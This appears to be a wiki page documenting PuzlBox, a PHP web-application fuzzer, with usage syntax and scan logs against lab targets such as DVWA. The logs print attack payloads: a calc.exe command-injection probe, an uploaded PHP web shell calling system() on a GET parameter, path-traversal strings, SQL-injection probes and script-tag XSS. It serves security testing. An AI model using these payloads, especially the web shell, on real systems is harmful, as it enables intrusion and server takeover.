Puzlbox
Jump to navigation
Jump to search
Description
PuzlBox is a PHP fuzzing tool written by John Leitch. It scans for several different vulnerabilities by performing dynamic program analysis. Following tests are currently performed:
- Arbitrary Command Execution
- Arbitrary File Read/Write/Change/Rename/Delete
- Local File Inclusion (LFI)
- Arbitrary PHP Execution
- SQL Injection
- Reflected Cross-site Scripting (XSS)
For each test, specific payloads (forged requests) are sent to the web application and responses from the server are analyzed. Depending on the results (HTTP response code, errors, ...), the test will be interpreted as positive (discovery of a potential vulnerability) or negative. All positives tests appear in the generated reports with sent payloads.
Installation
- Puzlbox is available here:
http://downloads.sourceforge.net/project/puzlbox1/puzlbox1022.zip
Note
If the link doesn't work, you can find it here: http://dl.dropbox.com/u/10761700/puzlbox.tar.gz
- Download, and unzip in C:\puzlbox\
Usage
Syntax
puzlbox [-s Server (default localhost)] [-m Scan Modes (default CFLPSX)] [Absolute Web Root] [-n No Unhook] [Application Paths (comma delimited)]
Note
The -s parameter seems not to work properly (tested on a Windows XP box).
Modes
Following modes are currently available:
- C - Arbitrary Command Execution
- F - Arbitrary File Read/Write/Change/Rename/Delete
- L - Local File Inclusion
- P - Arbitrary PHP Execution
- S - SQL Injection
- X - Reflected Cross-site Scripting
Refer to the examples section for details.
Note
Notice that without -m (mode) specified, all tests will be performed.
Running puzlbox
For PuzlBox to successfully run the following conditions must be met:
- PuzlBox must be run as administrator!
- The targeted web application must not be accessed while PuzlBox is running!
- Only one instance of PuzlBox per web root folder can be running at any time!
Reports
Two types of reports are generated:
- Scan Overview Report: All concerned fields with payloads will be reported in this report. You will will find what fields are potentially vulnerable to each attack.
- Vulnerability Report: If a vulnerability is confirmed, the complete payload with response will be reported in this report.
Examples
Environment
Full tests have been performed against various specific PHP applications to confirm all vulnerabilities. Environments include:
| Damn Vulnerable Web Application (DVWA) | http://downloads.sourceforge.net/project/dvwa/DVWA-1.0.7.zip |
| PoC to test SQL injections and Reflected Cross-site Scripting (XSS) | http://dl.dropbox.com/u/10761700/poc-sql-injection.rar |
| PoC to test Code Injection | http://dl.dropbox.com/u/10761700/poc-command-injection.rar |
| PoC to test Local File Inclusion (LFI) | http://dl.dropbox.com/u/10761700/poc-local-file-inclusion.rar |
Arbitrary Command Injection
The -m C parameter enables to challenge the application against arbitrary command injections tests. Its sends the string "C:\WINDOWS\system32\calc.exe" to form fields. Here the logs of puzlbox performed against a vulnerable application.
C:\puzlbox> puzlbox.exe -m C c:\web command-injection
produces:
----------------------------------------------------------------
Command Execution Scan
----------------------------------------------------------------
/command-injection/index.php
$_GET
cmd = C:\WINDOWS\system32\calc.exe
/command-injection/index.php
$_GET
cmd = C:\WINDOWS\system32\calc.exe
And here the alert, confirming the vulnerability:
Alert Name: Command Execution POST /command-injection/index.php?cmd=C%3a%5cWINDOWS%5csystem32%5ccalc.exe HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Arbitrary File Read/Write/Change/Rename/Delete
The -m F parameter enables to challenge the web application against various HTTP methods (red, write, change, rename, delete).
C:\puzlbox> puzlbox.exe -m F c:\web dvwa
Produces following results (extract):
----------------------------------------------------------------
Aribtray File Read/Write/Change/Rename/Delete Scan
----------------------------------------------------------------
/dvwa/about.php
/dvwa/ids_log.php
/dvwa/index.php
/dvwa/instructions.php
/dvwa/login.php
$_POST
Login = shell.php
username = shell.php
password = shell.php
/dvwa/logout.php
/dvwa/phpinfo.php
/dvwa/security.php
/dvwa/setup.php
$_POST
create_db = shell.php
/dvwa/vulnerabilities/view_help.php
[...TRUNCATED...]
On the other hand, a vulnerability has been confirmed:
Alert Name: Arbitrary File Upload POST /dvwa/vulnerabilities/upload/source/low.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 262 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="Upload" shell.php ------x Content-Disposition: form-data; name="uploaded"; filename="shell.php" Content-Type: application/octet-stream <?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?> ------x-- HTTP/1.1 200 OK Date: Mon, 03 Jan 2011 07:52:33 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.1 Content-Length: 526 Content-Type: text/html <br /> <b>Warning</b>: move_uploaded_file(DVWA_WEB_PAGE_TO_ROOThackable/uploads/shell.php) [<a href='function.move-uploaded-file'>function.move-uploaded-file</a>]: failed to open stream: No such file or directory in <b>C:\web\fern.php</b> on line <b>10</b><br /> <br /> <b>Warning</b>: move_uploaded_file() [<a href='function.move-uploaded-file'>function.move-uploaded-file</a>]: Unable to move 'C:\xampp\tmp\php473.tmp' to 'DVWA_WEB_PAGE_TO_ROOThackable/uploads/shell.php' in <b>C:\web\fern.php</b> on line <b>10</b><br /> ----------------------------------------------------------------
Local File Inclusion
The -m L parameter enables to challenge the application against Local File Inclusions (LFI) tests. The following command has been tested against a vulnerable application.
puzlbox.exe -m L c:\web local-file-inclusion
Produces following results (extract):
----------------------------------------------------------------
Local File Inclusion Scan
----------------------------------------------------------------
/local-file-inclusion/index.php
$_GET
page = ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt
/local-file-inclusion/index.php
$_GET
page = ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Flfi_test.txt
/local-file-inclusion/index.php
$_GET
page = ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt%00
Here the evidence of the vulnerability:
Alert Name: Local File Inclusion POST /local-file-inclusion/index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Mon, 03 Jan 2011 14:33:28 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.1 Content-Length: 393 Content-Type: text/html <html> <head> <title>Local File Inclusion</title> </head> <body> <form name="form1" method="get" action="index.php"> Select a page to load: <select name="page" onchange="document.form1.submit();"> <option value="page1.txt">page 1</option> <option value="page2.txt">page 2</option> <option value="page3.txt">page 3</option> </select> </form> LFI_Test123 </body> </html> ----------------------------------------------------------------
Arbitrary PHP Execution
The -m P parameter enables to challenge the application against arbitrary PHP execution tests. Its sends the following content to form fields: <?php echo 'testa'.'testb'; ?> with and without PHP tags.
puzlbox.exe -m P c:\web dvwa
Produces following results (extract):
----------------------------------------------------------------
Arbitrary PHP Execution Scan
----------------------------------------------------------------
/dvwa/about.php
/dvwa/ids_log.php
/dvwa/index.php
/dvwa/instructions.php
/dvwa/login.php
$_POST
Login = <?php echo 'testa'.'testb'; ?>
username = <?php echo 'testa'.'testb'; ?>
password = <?php echo 'testa'.'testb'; ?>
/dvwa/logout.php
/dvwa/phpinfo.php
/dvwa/security.php
/dvwa/setup.php
$_POST
create_db = <?php echo 'testa'.'testb'; ?>
/dvwa/vulnerabilities/view_help.php
[...TRUNCATED...]
SQL Injection
The -m S parameter enables to challenge the application against SQL injections tests. Tests have been run against a vulnerable index.php page that connects to a user table.
puzlbox.exe -m S c:\web sqlinj
Produces following results (extract):
----------------------------------------------------------------
SQL Injection Scan
----------------------------------------------------------------
/sqlinj/index.php
$_POST
username = ';--";--
password = ';--";--
/sqlinj/index.php
$_POST
username = \';--\";--
password = \';--\";--
id = \';--\";--
/sqlinj/index.php
$_POST
username = \\';--\\";--
password = \\';--\\";--
[...TRUNCATED...]
Vulnerabilities have been confirmed:
Alert Name: Potential SQL Injection
POST /sqlinj/index.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 147
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name="username"
';--";--
------x
Content-Disposition: form-data; name="id"
';--";--
------x--
HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 08:39:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 1589
Content-Type: text/html
<html>
<head><title>HACKING</title></head>
<body>
<div style="float:left">
<fieldset>
<legend>Select from ID</legend>
<form method="POST" action="index.php">
Enter ID: <input type="text" name="id" />
<input type="submit" value="Go" />
</form>
</fieldset>
</div>
<div style="float:left">
<fieldset>
<legend>Create user</legend>
<form method="POST" action="index.php">
<div>USERNAME: <input type="text" name="username" /></div>
<div>PASSWORD: <input type="text" name="password" /></div>
<div><input type="submit" value="Go" /></div>
</form>
</fieldset>
</div>
<div style="clear:both"></div>
<hr />
<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=';--";--</div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ;--";--' at line 1
----------------------------------------------------------------
Alert Name: Potential SQL Injection
POST /sqlinj/index.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 217
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name="username"
';--";--
------x
Content-Disposition: form-data; name="password"
';--";--
------x
Content-Disposition: form-data; name="id"
';--";--
------x--
HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 08:39:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 1468
Content-Type: text/html
<html>
<head><title>HACKING</title></head>
<body>
<div style="float:left">
<fieldset>
<legend>Select from ID</legend>
<form method="POST" action="index.php">
Enter ID: <input type="text" name="id" />
<input type="submit" value="Go" />
</form>
</fieldset>
</div>
<div style="float:left">
<fieldset>
<legend>Create user</legend>
<form method="POST" action="index.php">
<div>USERNAME: <input type="text" name="username" /></div>
<div>PASSWORD: <input type="text" name="password" /></div>
<div><input type="submit" value="Go" /></div>
</form>
</fieldset>
</div>
<div style="clear:both"></div>
<hr />
SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';--";--',;--";--')' at line 1
----------------------------------------------------------------
[...TRUNCATED...]
Reflected Cross-site Scripting
The -m X parameter enables to challenge the application against Reflected Cross-site Scripting (XSS) tests. The following has been tested against a vulnerable application (the same used for SQL injections).
C:\puzlbox> puzlbox.exe -m X c:\web sql-injection
Produces following results:
----------------------------------------------------------------
Reflected Cross-site Scripting Scan
----------------------------------------------------------------
/sql-injection/index.php
$_GET
id = 2<script>alert(0)</script>
/sql-injection/upload/cmd.php
$_GET
cmd = 7<script>alert(0)</script>
/sql-injection/index.php
$_GET
id = 5 <script>alert(0)</script>
/sql-injection/upload/cmd.php
$_GET
cmd = 9 <script>alert(0)</script>
And here the evidences of the vulnerability (extract):
Alert Name: Reflected XSS
GET /sql-injection/index.php?id=1%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 04:52:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 568
Content-Type: text/html
<html>
<head><title>HACKING</title></head>
<body>
<fieldset>
<legend>Select from ID</legend>
<form method="GET" action="index.php">
Enter ID: <input type="text" name="id" />
<input type="submit" value="Go" />
</form>
</fieldset>
<hr />
<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=1<script>alert(0)</script></div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/script>' at line 1
----------------------------------------------------------------
Alert Name: Reflected XSS
GET /sql-injection/index.php?id=2%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 04:52:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 568
Content-Type: text/html
<html>
<head><title>HACKING</title></head>
<body>
<fieldset>
<legend>Select from ID</legend>
<form method="GET" action="index.php">
Enter ID: <input type="text" name="id" />
<input type="submit" value="Go" />
</form>
</fieldset>
<hr />
<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=2<script>alert(0)</script></div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/script>' at line 1
----------------------------------------------------------------
Note
After some tests around this test (-m X), it seems that Puzlbox is only checking forms using the GET method (forms using POST method are not checked).